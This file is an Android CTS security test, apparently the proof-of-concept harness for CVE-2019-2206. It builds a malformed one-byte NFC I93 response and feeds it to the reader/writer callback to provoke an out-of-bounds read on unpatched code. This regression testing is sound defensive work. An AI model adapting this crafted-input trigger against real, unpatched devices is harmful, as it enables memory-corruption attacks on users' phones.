xref: /aosp_15_r20/cts/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp (revision b7c941bb3fa97aba169d73cee0bed2de8ac964bf)
1 /*
2  * Copyright (C) 2021 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
17 #include <nfc_api.h>
18 #include <nfc_int.h>
19 #include <rw_int.h>
20 #include <stdlib.h>
21 #include <tags_defs.h>
22 
// Fixed inputs for the crafted I93 response built in main().
#define RWLENGTH 32  // stored in rw_length; ndef_length is set to twice this
#define PLENGTH  1   // payload length written into the NFC_HDR `len` field
#define OFFSET   7   // payload offset written into the NFC_HDR `offset` field
26 
// Hand-written declarations borrowed from rw_i93.cc. They are repeated here
// rather than pulled from a header; the definitions are expected to come from
// the NFC library this harness links against.
extern tRW_CB rw_cb;    // reader/writer control block; main() edits rw_cb.tcb.i93
extern tNFC_CB nfc_cb;  // NFC control block; main() reads conn_cb[NFC_RF_CONN_ID]
extern void rw_init();
extern tNFC_STATUS rw_i93_select(uint8_t* p_uid);
32 
// Harness replacement for the GKI buffer release routine: deliberately a
// no-op. main() allocates its buffers with the C allocator and frees them
// itself, so nothing handed to this stub may be released here.
void GKI_freebuf(void *p_buf) {
  (void)p_buf;  // intentionally unused
}
34 
// Harness replacement for the GKI timer start routine: all three arguments
// are ignored and no timer is armed.
void GKI_start_timer(uint8_t, int32_t, bool) {
  // Intentionally empty.
}
36 
// Harness replacement for the GKI timer stop routine: the argument is ignored
// and nothing is cancelled, matching the no-op GKI_start_timer stub.
void GKI_stop_timer(uint8_t) {
  // Intentionally empty.
}
38 
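/**
 * Regression harness for CVE-2019-2206 (identifier taken from this file's
 * path). It initialises the reader/writer module, selects the I93 handler,
 * forces the I93 control block into the SET_READ_ONLY / WAIT_CC state and then
 * delivers one NFC_DATA_CEVT event whose NFC_HDR declares a PLENGTH-byte
 * payload at offset OFFSET.
 *
 * NOTE(review): the declared payload is a single byte, presumably shorter than
 * what the WAIT_CC handler needs; the test appears to rely on the library
 * rejecting that length, with a memory-safety sanitizer reporting the access
 * when it does not. Confirm against the fix for this CVE.
 *
 * @return EXIT_FAILURE if setup fails (handler selection, missing callback,
 *         allocation), EXIT_SUCCESS once the callback has returned.
 */
int main() {
  GKI_init();
  rw_init();

  // NOTE(review): only one byte backs this UID pointer. If rw_i93_select()
  // reads a full-length UID, that is an out-of-bounds stack read inside the
  // harness itself and could be reported instead of the defect under test.
  // Confirm the callee's contract and size the buffer to match.
  uint8_t p_uid = 1;
  if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
    return EXIT_FAILURE;
  }

  // The callback is looked up from library state; fail the setup cleanly
  // instead of calling through a null pointer if it was never registered.
  tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
  if (!p_cb->p_cback) {
    return EXIT_FAILURE;
  }

  // Zero-initialised so that fields this harness does not set explicitly are
  // never read as indeterminate heap content.
  tNFC_CONN *p_data = static_cast<tNFC_CONN *>(calloc(1, sizeof(tNFC_CONN)));
  if (!p_data) {
    return EXIT_FAILURE;
  }

  // Same byte count as before, but zero-filled: only `len` and `offset` are
  // written below, so every other byte the callback reads (the remaining
  // header fields and the payload) would otherwise be indeterminate and the
  // path taken through the library could vary from run to run.
  p_data->data.p_data =
      /* NOLINTNEXTLINE(clang-analyzer-unix.MallocSizeof) */
      static_cast<NFC_HDR *>(calloc(1, sizeof(uint8_t) * (OFFSET + PLENGTH) * 2));
  if (!p_data->data.p_data) {
    free(p_data);
    return EXIT_FAILURE;
  }

  // Put the I93 control block into the state whose handler is under test.
  tRW_I93_CB *p_i93 = &rw_cb.tcb.i93;
  p_i93->state = RW_I93_STATE_SET_READ_ONLY;
  p_i93->sub_state = RW_I93_SUBSTATE_WAIT_CC;
  p_i93->block_size = 1;
  p_i93->ndef_tlv_start_offset = 0;
  p_i93->rw_length = RWLENGTH;
  p_i93->ndef_length = p_i93->rw_length * 2;

  // Describe the response: status OK, PLENGTH payload byte(s) at OFFSET.
  p_data->status = NFC_STATUS_OK;
  NFC_HDR *p_resp = p_data->data.p_data;
  p_resp->len = PLENGTH;
  p_resp->offset = OFFSET;

  const tNFC_CONN_EVT event = NFC_DATA_CEVT;
  p_cb->p_cback(0, event, p_data);

  // GKI_freebuf() is stubbed out as a no-op in this file, so the harness still
  // owns both allocations and releases them here.
  free(p_data->data.p_data);
  free(p_data);

  return EXIT_SUCCESS;
}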
88